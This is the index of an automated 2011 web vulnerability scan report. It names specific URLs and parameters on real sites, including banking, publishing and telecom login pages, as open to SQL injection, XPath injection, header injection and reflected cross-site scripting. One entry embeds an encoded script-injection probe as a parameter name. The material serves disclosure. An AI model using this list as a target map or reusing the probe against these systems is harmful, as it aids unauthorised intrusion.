XSS, SQL Injection, HTTP Response Splitting, DORK, GHDB, Vulnerable Web Server

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Tue May 03 00:19:15 CDT 2011.



1. SQL injection

1.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [PluID parameter]

1.2. http://expertsystem.net/page.asp [idd parameter]

1.3. http://googleads.g.doubleclick.net/pagead/ads [num_ads parameter]

1.4. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [clicktag parameter]

1.5. http://webshop.elsevier.com/myarticleservices/booklets/ [product_id parameter]

1.6. http://www.ilsole24ore.com/favicon.ico [REST URL parameter 1]

1.7. http://www.ilsole24ore.com/s24service [REST URL parameter 1]

2. XPath injection

2.1. http://www.ansa.it/motori/ [REST URL parameter 1]

2.2. http://www.ansa.it/web/banner_js/ansa_banner_array.js [REST URL parameter 1]

2.3. http://www.ansa.it/web/banner_js/ansa_banner_array.js [REST URL parameter 2]

2.4. http://www.ansa.it/web/banner_js/ansa_banner_array.js [REST URL parameter 3]

2.5. http://www.ansa.it/web/banner_js/msn_banner_array.js [REST URL parameter 1]

2.6. http://www.ansa.it/web/banner_js/msn_banner_array.js [REST URL parameter 2]

2.7. http://www.ansa.it/web/banner_js/msn_banner_array.js [REST URL parameter 3]

2.8. http://www.ansa.it/web/images/favicon.ico [REST URL parameter 1]

2.9. http://www.ansa.it/web/images/favicon.ico [REST URL parameter 2]

2.10. http://www.ansa.it/web/images/favicon.ico [REST URL parameter 3]

2.11. http://www.ansa.it/web/notizie/photogallery/hp_photo_index.xml [REST URL parameter 1]

2.12. http://www.ansa.it/web/notizie/photogallery/hp_photo_index.xml [REST URL parameter 2]

2.13. http://www.ansa.it/web/notizie/photogallery/hp_photo_index.xml [REST URL parameter 3]

3. HTTP header injection

3.1. http://a.tribalfusion.com/h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/ [name of an arbitrarily supplied request parameter]

3.2. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/U6PZANHGRBHQFBIDRUUZ3E/33IKJE45JFAHDG4ETT36VB [REST URL parameter 2]

3.3. http://go.techtarget.com/activity/activity.gif [REST URL parameter 2]

3.4. http://mfr.247realmedia.com/RealMedia/ads/adstream.cap/123 [c parameter]

3.5. http://mfr.247realmedia.com/RealMedia/ads/adstream.cap/123 [dv parameter]

4. Cross-site scripting (reflected)

4.1. http://api.zanox.com/json/2011-03-01/applications/mediaslot/624BF84E5DF10228E1C8 [callback parameter]

4.2. http://digg.com/submit [REST URL parameter 1]

4.3. http://expertsystem.net/clienti_dettaglio.asp [cd550 parameter]

4.4. http://expertsystem.net/clienti_dettaglio.asp [name of an arbitrarily supplied request parameter]

4.5. http://expertsystem.net/clienti_home.asp [name of an arbitrarily supplied request parameter]

4.6. http://expertsystem.net/demo_prodotti.asp [name of an arbitrarily supplied request parameter]

4.7. http://expertsystem.net/page.asp [name of an arbitrarily supplied request parameter]

4.8. http://expertsystem.net/vetrinanews.asp [name of an arbitrarily supplied request parameter]

4.9. http://finanza-mercati.ilsole24ore.com/quotazioni.php [name of an arbitrarily supplied request parameter]

4.10. http://geoisp.virgilio.it/geo.php [callback parameter]

4.11. http://go.techtarget.com//clicktrack-r/activity/a [REST URL parameter 3]

4.12. http://go.techtarget.com//clicktrack-r/activity/activity.gif [REST URL parameter 3]

4.13. http://go.techtarget.com/activity/activity.gif [REST URL parameter 2]

4.14. http://go.techtarget.com/clicktrack-r/activity/a [REST URL parameter 3]

4.15. http://go.techtarget.com/clicktrack-r/activity/activity.gif [REST URL parameter 3]

4.16. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [clicktag parameter]

4.17. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [clicktag parameter]

4.18. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [name of an arbitrarily supplied request parameter]

4.19. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [name of an arbitrarily supplied request parameter]

4.20. http://webshop.elsevier.com/forgotpassword.html [name of an arbitrarily supplied request parameter]

4.21. https://webshop.elsevier.com/login.cfm [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003C)%3C/script%3E parameter]

4.22. https://webshop.elsevier.com/login.cfm [d46 parameter]

4.23. https://webshop.elsevier.com/login.cfm [name of an arbitrarily supplied request parameter]

4.24. http://www.addthis.com/bookmark.php [REST URL parameter 1]

4.25. http://www.addthis.com/bookmark.php [REST URL parameter 1]

4.26. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

4.27. http://www.camera.it/1 [name of an arbitrarily supplied request parameter]

4.28. http://www.camera.it/1 [name of an arbitrarily supplied request parameter]

4.29. http://www.elsevier.com/wps/find/advproductsearch.cws_home [REST URL parameter 3]

4.30. http://www.elsevier.com/wps/find/advproductsearch.cws_home [REST URL parameter 3]

4.31. http://www.elsevier.com/wps/find/advproductsearch.cws_home [REST URL parameter 3]

4.32. http://www.elsevier.com/wps/find/advproductsearch.cws_home [name of an arbitrarily supplied request parameter]

4.33. http://www.elsevier.com/wps/find/advproductsearch.cws_home [name of an arbitrarily supplied request parameter]

4.34. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [REST URL parameter 3]

4.35. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [REST URL parameter 3]

4.36. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [REST URL parameter 3]

4.37. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [name of an arbitrarily supplied request parameter]

4.38. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [name of an arbitrarily supplied request parameter]

4.39. http://www.eni.com/mobile/page.do [locale parameter]

4.40. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp [name of an arbitrarily supplied request parameter]

4.41. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp [name of an arbitrarily supplied request parameter]

4.42. http://www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp [name of an arbitrarily supplied request parameter]

4.43. https://www.webank.it/ [name of an arbitrarily supplied request parameter]

4.44. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do [OBS_KEY parameter]

4.45. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do [OBS_KEY parameter]

4.46. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do [tabId parameter]

4.47. https://www.webank.it/webankpub/wb/fpServizi.do [OBS_KEY parameter]

4.48. https://www.webank.it/webankpub/wb/fpServizi.do [tabId parameter]

4.49. https://www.webank.it/webankpub/wb/home.do [OBS_KEY parameter]

4.50. https://www.webank.it/webankpub/wb/home.do [tabId parameter]

4.51. http://www.addthis.com/bookmark.php [Referer HTTP header]

4.52. http://www.addthis.com/bookmark.php [Referer HTTP header]

4.53. http://www.addthis.com/bookmark.php [Referer HTTP header]

4.54. http://www.autostrade.it/autostrade/jsonBridge [JSESSIONID cookie]

4.55. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do [ultimeTrePagine cookie]

4.56. https://www.webank.it/webankpub/wb/fpServizi.do [ultimeTrePagine cookie]

5. Flash cross-domain policy

5.1. http://ad-emea.doubleclick.net/crossdomain.xml

5.2. http://ad78.neodatagroup.com/crossdomain.xml

5.3. http://adlev.neodatagroup.com/crossdomain.xml

5.4. http://bs.serving-sys.com/crossdomain.xml

5.5. http://cdn1.eyewonder.com/crossdomain.xml

5.6. http://cdn4.eyewonder.com/crossdomain.xml

5.7. http://documenti.camera.it/crossdomain.xml

5.8. http://ds.serving-sys.com/crossdomain.xml

5.9. http://elstatic.weborama.fr/crossdomain.xml

5.10. https://eprocurement.eni.it/crossdomain.xml

5.11. http://fls.doubleclick.net/crossdomain.xml

5.12. http://ieo.solution.weborama.fr/crossdomain.xml

5.13. http://media.fastclick.net/crossdomain.xml

5.14. http://metrics.ilsole24ore.com/crossdomain.xml

5.15. http://mfr.247realmedia.com/crossdomain.xml

5.16. http://omniture.virgilio.it/crossdomain.xml

5.17. http://paginebianche.ilsole24ore.com/crossdomain.xml

5.18. http://paginegialle.ilsole24ore.com/crossdomain.xml

5.19. http://secure-it.imrworldwide.com/crossdomain.xml

5.20. http://statse.webtrendslive.com/crossdomain.xml

5.21. http://video.ilsole24ore.com/crossdomain.xml

5.22. http://www.luxury24.ilsole24ore.com/crossdomain.xml

5.23. http://www.motori24.ilsole24ore.com/crossdomain.xml

5.24. http://www.yoox.com/crossdomain.xml

5.25. http://zanox01.webtrekk.net/crossdomain.xml

5.26. http://adimg.alice.it/crossdomain.xml

5.27. http://adv.ilsole24ore.it/crossdomain.xml

5.28. http://answers.yahoo.com/crossdomain.xml

5.29. http://api.bing.com/crossdomain.xml

5.30. http://edition.cnn.com/crossdomain.xml

5.31. http://en.camera.it/crossdomain.xml

5.32. http://finanza-mercati.ilsole24ore.com/crossdomain.xml

5.33. http://friendfeed.com/crossdomain.xml

5.34. http://giochi-tiscali.king.com/crossdomain.xml

5.35. http://it.yahoo.com/crossdomain.xml

5.36. http://itunes.apple.com/crossdomain.xml

5.37. http://nuovo.camera.it/crossdomain.xml

5.38. http://static.ak.fbcdn.net/crossdomain.xml

5.39. https://www.eni.com/crossdomain.xml

5.40. http://imagesdotcom.ilsole24ore.com/crossdomain.xml

5.41. http://job24.ilsole24ore.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml

6.2. http://ad78.neodatagroup.com/clientaccesspolicy.xml

6.3. http://adlev.neodatagroup.com/clientaccesspolicy.xml

6.4. http://cdn1.eyewonder.com/clientaccesspolicy.xml

6.5. http://elstatic.weborama.fr/clientaccesspolicy.xml

6.6. http://ieo.solution.weborama.fr/clientaccesspolicy.xml

6.7. http://metrics.ilsole24ore.com/clientaccesspolicy.xml

6.8. http://omniture.virgilio.it/clientaccesspolicy.xml

6.9. http://secure-it.imrworldwide.com/clientaccesspolicy.xml

6.10. http://api.bing.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://cp.mightyblue.com/

7.2. http://cp.mightyblue.com/default.asp

7.3. http://digg.com/submit

7.4. http://du.ilsole24ore.com/utenti/Registrazione.aspx

7.5. http://du.ilsole24ore.com/utenti/facebook_connect.aspx

7.6. http://jsdotcom.ilsole24ore.com/js2010/common.min.js

7.7. http://jsdotcom.ilsole24ore.com/js2010/soleLib.js

7.8. http://pf.rossoalice.alice.it/login.html

7.9. http://www.genialloyd.it/GlfeWeb/area_personale/recupera_password.jsp

7.10. http://www.genialloyd.it/GlfeWeb/gl/it/home.html

7.11. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp

7.12. http://www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp

7.13. http://www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp

7.14. http://www.telecomitalia.it/

8. XML injection

9. Password returned in later response

10. SSL cookie without secure flag set

10.1. https://account.musfiber.com/login.php

10.2. https://areaclienti187.telecomitalia.it/auth/recuperapassword.do

10.3. https://areaclienti187.telecomitalia.it/auth/registrautente.do

10.4. https://areaclienti187.telecomitalia.it/cdas187/d/a/p18485/serv.do

10.5. https://areaclienti187.telecomitalia.it/cdas187/d/a/p21608/serv2.do

10.6. https://areaclienti187.telecomitalia.it/cdas187/d/a/p21618/serv3.do

10.7. https://eprocurement.eni.it/default.asp

10.8. https://secure.mightyblue.com/default.asp

10.9. https://secure.mightyblue.com/default.asp

10.10. https://www.sciencedirect.com/science

10.11. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do

10.12. https://feedback.live.com/default.aspx

11. Session token in URL

11.1. http://job24.ilsole24ore.com/news/Articoli/2011/04/bertolino-Consumer-Retention-Management-aprile-2011.php

11.2. https://ui.zanox-affiliate.de/bin/z_in_frm.dll

11.3. http://web.progress.com/docs/gated/campaigns/bpm_search3.htm

11.4. http://www.autostrade.it/videoXml/previsioni-videoListSmall-it.xml

11.5. http://www.computerworld.com/s/article/9214732/Semantic_Web_Tools_you_can_use

11.6. http://www.facebook.com/extern/login_status.php

11.7. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp

11.8. http://www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp

12. SSL certificate

12.1. https://ads.bluelithium.com/

12.2. https://feedback.live.com/

12.3. https://areaclienti187.telecomitalia.it/

12.4. https://eprocurement.eni.it/

12.5. https://seal.verisign.com/

12.6. https://secure.mightyblue.com/

12.7. https://ui.zanox-affiliate.de/

12.8. https://www.eni.com/

12.9. https://www.webank.it/

13. Password field submitted using GET method

14. Cookie scoped to parent domain

14.1. http://rainbow.mythings.com/pix.aspx

14.2. http://www.capterra.com/

14.3. http://www.capterra.com/business-management-and-analytics-software

14.4. http://www.capterra.com/business-process-management-software

14.5. http://www.house24.ilsole24ore.com/external/showCase/library-luxury24~2.js

14.6. http://www.house24.ilsole24ore.com/vimages/default/logos/house24extCarouselBanner.png

14.7. http://www.sciencedirect.com/science/journal/09574174

14.8. https://www.sciencedirect.com/science

14.9. http://www.yoox.com/scripts/services/dynamicsGalleryService.asp

14.10. http://a.tribalfusion.com/h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/

14.11. http://a.tribalfusion.com/j.ad

14.12. http://ad.doubleclick.net/adj/N3024.152171.WEBSYSTEM_ILSOLE24O/B5226098

14.13. http://ad.doubleclick.net/adj/els.SDguest/ISSNgeneral

14.14. http://ad78.neodatagroup.com/ad/tiscaliadv.jsp

14.15. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

14.16. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/07/sole5/shopping24/44374678/Top/OasDefault/Experteer_SGR_am_110503/IT_Leaderboard_728x90no_button_copy.gif/61646331643666333464626633303930

14.17. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1301110576/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

14.18. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1494137922/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

14.19. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1694123445/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

14.20. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1747038723/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

14.21. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1747140575/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

14.22. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1845993609/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

14.23. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1968511751/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

14.24. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

14.25. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/220106844/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

14.26. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/482545817/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

14.27. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/558533179/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

14.28. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/669678699/VideoBox_2/OasDefault/Experteer_SGR_am_110503/300x250_solo_posizioni_per_dirigenti84894.gif/61646331643666333464626632633930

14.29. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/725179361/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

14.30. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/741128699/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

14.31. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/909166720/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

14.32. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1325040199@Top

14.33. http://adv.ilsole24ore.it/RealMedia/ads/click_lx.ads/www.ilsole24ore.it/07/sole5/shopping24/926333658/Top/OasDefault/BancaPopMilano_XGR_am_110502/83881.html/61646331643666333464626632633930

14.34. http://adv.ilsole24ore.it/RealMedia/ads/click_lx.ads/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

14.35. http://answers.yahoo.com/question/index

14.36. http://auth.rossoalice.alice.it/aap/serviceforwarder

14.37. http://bs.serving-sys.com/BurstingPipe/adServer.bs

14.38. http://cdn4.eyewonder.com/cm/tr/17671-124835-21707-7

14.39. http://del.icio.us/post

14.40. http://go.techtarget.com//clicktrack-r/activity/activity.gif

14.41. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi

14.42. http://it.yahoo.com/add

14.43. http://local.virgilio.it/scripts/jquery.cookie.js

14.44. http://mail.alice.it/

14.45. http://mail.alice.it/common/VIRGILIO/header2008/stili/header_alice.css

14.46. http://mail.alice.it/css/popup.css

14.47. http://mail.alice.it/css/stili.css

14.48. http://mail.alice.it/css/stili_overwrite.css

14.49. http://mail.alice.it/css/stili_stampa.css

14.50. http://mail.alice.it/images/bg_bottombox0.gif

14.51. http://mail.alice.it/images/bg_pop.jpg

14.52. http://mail.alice.it/images/bt_registrati00.gif

14.53. http://mail.alice.it/images/butt_registrati.png

14.54. http://mail.alice.it/images/header/immagine.png

14.55. http://mail.alice.it/images/ico_busta_link.gif

14.56. http://mail.alice.it/images/ico_disc_red.gif

14.57. http://mail.alice.it/images/ico_preferiti.gif

14.58. http://mail.alice.it/images/ico_stampa.gif

14.59. http://mail.alice.it/images/ico_vverde15.gif

14.60. http://mail.alice.it/images/ico_xrosso15.gif

14.61. http://mail.alice.it/js/scriptflash.js

14.62. http://media.fastclick.net/w/tre

14.63. http://metrics.ilsole24ore.com/b/ss/s24onewsprod,s24oglobal/1/H.20.3/s78620203291065

14.64. http://metrics.ilsole24ore.com/b/ss/s24oshoppreprod/1/H.20.3/s76706321355364

14.65. http://omniture.virgilio.it/b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955

14.66. http://paginebianche.ilsole24ore.com/execute.cgi

14.67. http://pixel.rubiconproject.com/tap.php

14.68. http://search.yahoo.com/bin/search

14.69. http://secure-it.imrworldwide.com/cgi-bin/m

14.70. http://www.bing.com/

15. Cookie without HttpOnly flag set

15.1. https://account.musfiber.com/login.php

15.2. https://areaclienti187.telecomitalia.it/auth/recuperapassword.do

15.3. https://areaclienti187.telecomitalia.it/auth/registrautente.do

15.4. https://areaclienti187.telecomitalia.it/cdas187/d/a/p18485/serv.do

15.5. https://areaclienti187.telecomitalia.it/cdas187/d/a/p21608/serv2.do

15.6. https://areaclienti187.telecomitalia.it/cdas187/d/a/p21618/serv3.do

15.7. http://attiva.ilsole24ore.com/pr_home.jsp

15.8. http://compraonline.mediaworld.it/webapp/wcs/stores/servlet/PartnerVisit

15.9. http://cp.mightyblue.com/

15.10. http://cp.mightyblue.com/forgotPassword.asp

15.11. http://cp.mightyblue.com/forgotPassword.asp

15.12. https://eprocurement.eni.it/default.asp

15.13. http://expertsystem.net/

15.14. http://factbook.eni.com/en

15.15. http://factbook.eni.com/en/home

15.16. http://finanza-mercati.ilsole24ore.com/fcxp

15.17. http://mightyblue.com/

15.18. http://multicard.eni.com/it_en

15.19. http://paginebianche.ilsole24ore.com/execute.cgi

15.20. http://paginegialle.ilsole24ore.com/pgolfe/action

15.21. http://rainbow.mythings.com/pix.aspx

15.22. http://searchcio-midmarket.techtarget.com/definition/expert-system

15.23. http://searchcio.techtarget.com/news/2240030637/CIO-survey-IT-salaries-in-2010-and-how-they-vary-by-industry

15.24. https://secure.mightyblue.com/default.asp

15.25. https://secure.mightyblue.com/default.asp

15.26. http://technology.searchcio-midmarket.com/kw

15.27. http://technorati.com/faves

15.28. http://webshop.elsevier.com/specialissues/

15.29. http://websystem.ilsole24ore.com/jsp/Experteer_SGR_qi_100617_img.jsp

15.30. http://websystem.ilsole24ore.com/jsp/Guidaffari_SHW_qi_090114_img.jsp

15.31. http://websystem.ilsole24ore.com/jsp/PortaleAutomob_SGR_qi_081104_HTMGIF.jsp

15.32. http://www.applications.sciverse.com/action/appDetail/292639

15.33. http://www.autostrade.it/autostrade/isMobile.do

15.34. http://www.capterra.com/

15.35. http://www.capterra.com/business-management-and-analytics-software

15.36. http://www.capterra.com/business-process-management-software

15.37. http://www.casa.it/vendita

15.38. http://www.elsevier.com/wps/find/advproductsearch.cws_home

15.39. http://www.elsevier.com/wps/find/journaldescription.cws_home/939/description

15.40. http://www.elsevier.com/wps/find/subject_area_browse.cws_home

15.41. http://www.eni.com/login/LoginServletOSSO

15.42. http://www.eni.com/mobile/page.do

15.43. http://www.genialloyd.it/GlfeWeb/do/processHomePage

15.44. http://www.genialloyd.it/GlfeWeb/genialloyd/css_min/common.css

15.45. http://www.genialloyd.it/GlfeWeb/gl/it/home.html

15.46. http://www.genialloyd.it/GlfeWeb/js_min/mootools-more.js

15.47. http://www.genialloyd.it/GlfeWeb/js_min/mootools.js

15.48. http://www.house24.ilsole24ore.com/external/showCase/library-luxury24~2.js

15.49. http://www.house24.ilsole24ore.com/vimages/default/logos/house24extCarouselBanner.png

15.50. http://www.luxury24.ilsole24ore.com/common/counter.php

15.51. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp

15.52. http://www.telepass.it/AutostradeETIWeb/immagineSpazio

15.53. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do

15.54. http://www.yoox.com/scripts/services/dynamicsGalleryService.asp

15.55. http://a.tribalfusion.com/h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/

15.56. http://a.tribalfusion.com/j.ad

15.57. http://ad.doubleclick.net/adj/N3024.152171.WEBSYSTEM_ILSOLE24O/B5226098

15.58. http://ad.doubleclick.net/adj/els.SDguest/ISSNgeneral

15.59. http://ad.yieldmanager.com/pixel

15.60. http://ad78.neodatagroup.com/ad/tiscaliadv.jsp

15.61. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

15.62. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/07/sole5/shopping24/44374678/Top/OasDefault/Experteer_SGR_am_110503/IT_Leaderboard_728x90no_button_copy.gif/61646331643666333464626633303930

15.63. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1301110576/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

15.64. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1494137922/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

15.65. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1694123445/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

15.66. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1747038723/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

15.67. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1747140575/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

15.68. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1845993609/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

15.69. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1968511751/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

15.70. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

15.71. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/220106844/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

15.72. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/482545817/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

15.73. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/558533179/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

15.74. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/669678699/VideoBox_2/OasDefault/Experteer_SGR_am_110503/300x250_solo_posizioni_per_dirigenti84894.gif/61646331643666333464626632633930

15.75. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/725179361/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

15.76. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/741128699/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

15.77. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/909166720/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

15.78. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1325040199@Top

15.79. http://adv.ilsole24ore.it/RealMedia/ads/click_lx.ads/www.ilsole24ore.it/07/sole5/shopping24/926333658/Top/OasDefault/BancaPopMilano_XGR_am_110502/83881.html/61646331643666333464626632633930

15.80. http://adv.ilsole24ore.it/RealMedia/ads/click_lx.ads/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

15.81. http://answers.yahoo.com/question/index

15.82. http://assicurazione-auto.ansa.it/

15.83. http://auth.rossoalice.alice.it/aap/serviceforwarder

